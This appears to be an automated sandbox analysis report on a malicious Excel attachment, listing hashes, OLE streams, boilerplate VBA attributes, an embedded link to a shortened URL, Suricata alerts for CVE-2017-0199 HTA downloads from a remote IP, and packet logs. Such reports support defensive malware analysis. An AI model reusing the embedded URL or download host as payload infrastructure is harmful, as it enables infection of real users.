                                                              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                              Static File Info

                                                              General

                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 02:09:56 2024, Security: 1
                                                              Entropy (8bit):7.964215783305016
                                                              TrID:
                                                              • Microsoft Excel sheet (30009/1) 47.99%
                                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                              File name:PI#0034250924.xla.xlsx
                                                              File size:656'896 bytes
                                                              MD5:7e28f8cffffe2ee9420b3ea7915101a4
                                                              SHA1:83f9b8f410ed49d2de8fcee1d3659deb8d06adcf
                                                              SHA256:2319aa2adb90c44bec9ad97f567b060722bdf5084e7f9b43c65b0feaee993227
                                                              SHA512:0dd7024b56b83cf82f5c2ef471921e04c00ef80b22dc6e6365612e2370ea265cc7b82002586bbccc5e72b531036b2f11c58c68a4eba3a3d4468d9ab7ccf5d2d1
                                                              SSDEEP:12288:jcShW/K0fcVcM2gEPYvfvKtekPWRpw8hLMJKj:j3hW/LeJEgviIRDh5j
                                                              TLSH:5CD4230631C69E1ECA4B58724E90EDE6D128BC6A2F5FDC0B77D97B1E807CBB65502324
                                                              File Content Preview:........................>...................................9...................|.......~...............b.......d..............................................................................................................................................

                                                              File Icon

                                                              Icon Hash:2562ab89a7b7bfbf

                                                              Static OLE Info

                                                              General

                                                              Document Type:OLE
                                                              Number of OLE Files:1

                                                              OLE File "PI#0034250924.xla.xlsx"

                                                              Indicators
                                                              Has Summary Info:
                                                              Application Name:Microsoft Excel
                                                              Encrypted Document:True
                                                              Contains Word Document Stream:False
                                                              Contains Workbook/Book Stream:True
                                                              Contains PowerPoint Document Stream:False
                                                              Contains Visio Document Stream:False
                                                              Contains ObjectPool Stream:False
                                                              Flash Objects Count:0
                                                              Contains VBA Macros:True
                                                              Summary
                                                              Code Page:1252
                                                              Author:
                                                              Last Saved By:
                                                              Create Time:2006-09-16 00:00:00
                                                              Last Saved Time:2024-09-30 01:09:56
                                                              Creating Application:Microsoft Excel
                                                              Security:1
                                                              Document Summary
                                                              Document Code Page:1252
                                                              Thumbnail Scaling Desired:False
                                                              Contains Dirty Links:False
                                                              Shared Document:False
                                                              Changed Hyperlinks:False
                                                              Application Version:786432

                                                              Streams with VBA

                                                              VBA File Name: Sheet1.cls, Stream Size: 977
                                                              General
                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                              VBA File Name:Sheet1.cls
                                                              Stream Size:977
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z M . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 1c 5a ca 4d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                              VBA Code
                                                              Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                              VBA File Name: Sheet2.cls, Stream Size: 977
                                                              General
                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                              VBA File Name:Sheet2.cls
                                                              Stream Size:977
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z $ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 1c 5a 24 88 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                              VBA Code
                                                              Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                              VBA File Name: Sheet3.cls, Stream Size: 977
                                                              General
                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                              VBA File Name:Sheet3.cls
                                                              Stream Size:977
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 1c 5a 9b e8 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                              VBA Code
                                                              Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                              VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                              General
                                                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                              VBA File Name:ThisWorkbook.cls
                                                              Stream Size:985
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 1c 5a 8c a3 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                              VBA Code
                                                              Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                              Streams

                                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                              General
                                                              Stream Path:\x1CompObj
                                                              CLSID:
                                                              File Type:data
                                                              Stream Size:114
                                                              Entropy:4.25248375192737
                                                              Base64 Encoded:True
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                              General
                                                              Stream Path:\x5DocumentSummaryInformation
                                                              CLSID:
                                                              File Type:data
                                                              Stream Size:244
                                                              Entropy:2.889430592781307
                                                              Base64 Encoded:False
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                              General
                                                              Stream Path:\x5SummaryInformation
                                                              CLSID:
                                                              File Type:data
                                                              Stream Size:200
                                                              Entropy:3.2503503175049815
                                                              Base64 Encoded:False
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . J R v . . . . . . . . . .
                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                              Stream Path: MBd0019C634/\x1CompObj, File Type: data, Stream Size: 99
                                                              General
                                                              Stream Path:MBd0019C634/\x1CompObj
                                                              CLSID:
                                                              File Type:data
                                                              Stream Size:99
                                                              Entropy:3.631242196770981
                                                              Base64 Encoded:False
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                              Stream Path: MBd0019C634/Package, File Type: Microsoft Excel 2007+, Stream Size: 27478
                                                              General
                                                              Stream Path:MBd0019C634/Package
                                                              CLSID:
                                                              File Type:Microsoft Excel 2007+
                                                              Stream Size:27478
                                                              Entropy:7.767256957232999
                                                              Base64 Encoded:True
                                                              Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                              Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                              Stream Path: MBd0019C635/\x1Ole, File Type: data, Stream Size: 502
                                                              General
                                                              Stream Path:MBd0019C635/\x1Ole
                                                              CLSID:
                                                              File Type:data
                                                              Stream Size:502
                                                              Entropy:4.715426269436418
                                                              Base64 Encoded:False
                                                              Data ASCII:. . . . ; . ^ ; . . . . . . . . . . . . . ^ . . . y . . . K . Z . . . h . t . t . p . s . : . / . / . o . g . 1 . . . i . n . / . T . s . 9 . z . j . e . . . % . k H 2 . P t B @ h . ' ] } k c . o . . W . . . . . . . . . . . . . . . . . 8 . . . u . r . g . j . u . 7 . q . S . I . y . a . Y . 6 . r . M . f . o . R . v . q . J . j . F . I . 1 . M . R . x . D . h . J . 0 . c . g . Z . C . O . I . L . D . j . T . f . x . N . U . j . 5 . 0 . K . G . 2 . e . d . 9 . p . K . m . a . M . F . c . H . R . L . P . B .
                                                              Data Raw:01 00 00 02 3b a4 1d 5e 8b 3b d1 03 00 00 00 00 00 00 00 00 00 00 00 00 5e 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 5a 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6f 00 67 00 31 00 2e 00 69 00 6e 00 2f 00 54 00 73 00 39 00 7a 00 6a 00 65 00 00 00 d9 25 cc bf 6b 48 32 e0 d1 e6 c4 ca 0b b5 50 74 42 40 68 cc 05 27 a0 f3 82 5d d5 7d cd 6b 63 b5 1f a9 6f d9
                                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 609348
                                                              General
                                                              Stream Path:Workbook
                                                              CLSID:
                                                              File Type:Applesoft BASIC program data, first line number 16
                                                              Stream Size:609348
                                                              Entropy:7.9994350506569
                                                              Base64 Encoded:True
                                                              Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . . ' h ) " . & . E l $ { . n . . . q ? F o . . . ` V . . . . . . . . . . . . % . . . \\ . p . } ( v 6 O . \\ x T \\ { R S . e m ! . , k a ] + \\ . . t # . $ D ! X C . E Y ` b L ? . 5 L . J . . T . y y z m Z ? \\ . . x ) B . . . l a . . . . . . = . . . . 1 N . . . | . e . c [ Z e X . . . , . . . . . . . . . . . . . . . . . . y . . . 8 A = . . . h T ; / . 8 f @ . . . f . . . . g " . . . . . . . Q . . . . . . . 1 . . . . > ` * . ^ E L b x | . I G K 1 . . . & .
                                                              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 a7 bc 1d e2 01 27 68 86 29 22 14 8c e9 e8 f2 86 26 ee dd 80 45 6c 24 7b 06 f3 6e c5 c8 be c6 00 0f 71 fb 3f ba 46 6f 1b a6 88 03 00 60 56 7f da 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 25 e5 e2 00 00 00 5c 00 70 00 7d 28 76 36 89 c0 4f f3 98 9c 9c 5c e0 78 54 ef 5c 93 ef 7b a3 8d 52 98 53 1a
                                                              Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 527
                                                              General
                                                              Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                              CLSID:
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Stream Size:527
                                                              Entropy:5.243063286598671
                                                              Base64 Encoded:True
                                                              Data ASCII:I D = " { 6 B C E 3 7 9 1 - F A D 8 - 4 C A 2 - A 4 B 9 - 7 7 7 F D 1 E F 2 8 5 6 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 5 1 7 0 8 7 3 0 8 B E 0 C B E 0
                                                              Data Raw:49 44 3d 22 7b 36 42 43 45 33 37 39 31 2d 46 41 44 38 2d 34 43 41 32 2d 41 34 42 39 2d 37 37 37 46 44 31 45 46 32 38 35 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                              Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                              General
                                                              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                              CLSID:
                                                              File Type:data
                                                              Stream Size:104
                                                              Entropy:3.0488640812019017
                                                              Base64 Encoded:False
                                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                              Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                                                              General
                                                              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                              CLSID:
                                                              File Type:data
                                                              Stream Size:2644
                                                              Entropy:3.9872515177100163
                                                              Base64 Encoded:False
                                                              Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                              Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                              Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                                                              General
                                                              Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                              CLSID:
                                                              File Type:data
                                                              Stream Size:553
                                                              Entropy:6.37714525615049
                                                              Base64 Encoded:True
                                                              Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                                              Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 18 f1 0a 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-09-30T10:26:17.393729+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249166104.168.7.780TCP
                                                              2024-09-30T10:26:17.393742+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1104.168.7.780192.168.2.2249166TCP
                                                              2024-09-30T10:26:20.094232+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249168104.168.7.780TCP
                                                              2024-09-30T10:26:20.099163+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1104.168.7.780192.168.2.2249168TCP

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 30, 2024 10:26:15.482453108 CEST49165443192.168.2.22172.67.216.244
                                                              Sep 30, 2024 10:26:15.482479095 CEST44349165172.67.216.244192.168.2.22
                                                              Sep 30, 2024 10:26:15.482554913 CEST49165443192.168.2.22172.67.216.244
                                                              Sep 30, 2024 10:26:15.502788067 CEST49165443192.168.2.22172.67.216.244
                                                              Sep 30, 2024 10:26:15.502800941 CEST44349165172.67.216.244192.168.2.22
                                                              Sep 30, 2024 10:26:15.977619886 CEST44349165172.67.216.244192.168.2.22
                                                              Sep 30, 2024 10:26:15.977715015 CEST49165443192.168.2.22172.67.216.244
                                                              Sep 30, 2024 10:26:15.983274937 CEST49165443192.168.2.22172.67.216.244
                                                              Sep 30, 2024 10:26:15.983290911 CEST44349165172.67.216.244192.168.2.22
                                                              Sep 30, 2024 10:26:15.983710051 CEST44349165172.67.216.244192.168.2.22
                                                              Sep 30, 2024 10:26:15.983761072 CEST49165443192.168.2.22172.67.216.244
                                                              Sep 30, 2024 10:26:16.122885942 CEST49165443192.168.2.22172.67.216.244
                                                              Sep 30, 2024 10:26:16.163418055 CEST44349165172.67.216.244192.168.2.22
                                                              Sep 30, 2024 10:26:16.899585962 CEST44349165172.67.216.244192.168.2.22
                                                              Sep 30, 2024 10:26:16.899671078 CEST44349165172.67.216.244192.168.2.22
                                                              Sep 30, 2024 10:26:16.899825096 CEST49165443192.168.2.22172.67.216.244
                                                              Sep 30, 2024 10:26:16.899825096 CEST49165443192.168.2.22172.67.216.244
                                                              Sep 30, 2024 10:26:16.904702902 CEST49165443192.168.2.22172.67.216.244
                                                              Sep 30, 2024 10:26:16.904736996 CEST44349165172.67.216.244192.168.2.22
                                                              Sep 30, 2024 10:26:16.921593904 CEST4916680192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:16.926542044 CEST8049166104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:16.926759958 CEST4916680192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:16.926759958 CEST4916680192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:16.931876898 CEST8049166104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:17.393667936 CEST8049166104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:17.393690109 CEST8049166104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:17.393707991 CEST8049166104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:17.393727064 CEST8049166104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:17.393728971 CEST4916680192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:17.393742085 CEST8049166104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:17.393755913 CEST8049166104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:17.393770933 CEST8049166104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:17.393775940 CEST4916680192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:17.393775940 CEST4916680192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:17.393775940 CEST4916680192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:17.393785000 CEST8049166104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:17.393800974 CEST8049166104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:17.393805027 CEST4916680192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:17.393814087 CEST8049166104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:17.393838882 CEST4916680192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:17.393838882 CEST4916680192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:17.393847942 CEST4916680192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:17.398817062 CEST8049166104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:17.398835897 CEST8049166104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:17.398853064 CEST8049166104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:17.398870945 CEST4916680192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:17.398885012 CEST4916680192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:17.399951935 CEST4916680192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:17.480377913 CEST8049166104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:17.480408907 CEST8049166104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:17.480424881 CEST8049166104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:17.480429888 CEST4916680192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:17.480439901 CEST8049166104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:17.480457067 CEST8049166104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:17.480457067 CEST4916680192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:17.480457067 CEST4916680192.168.2.22104.168.7.7
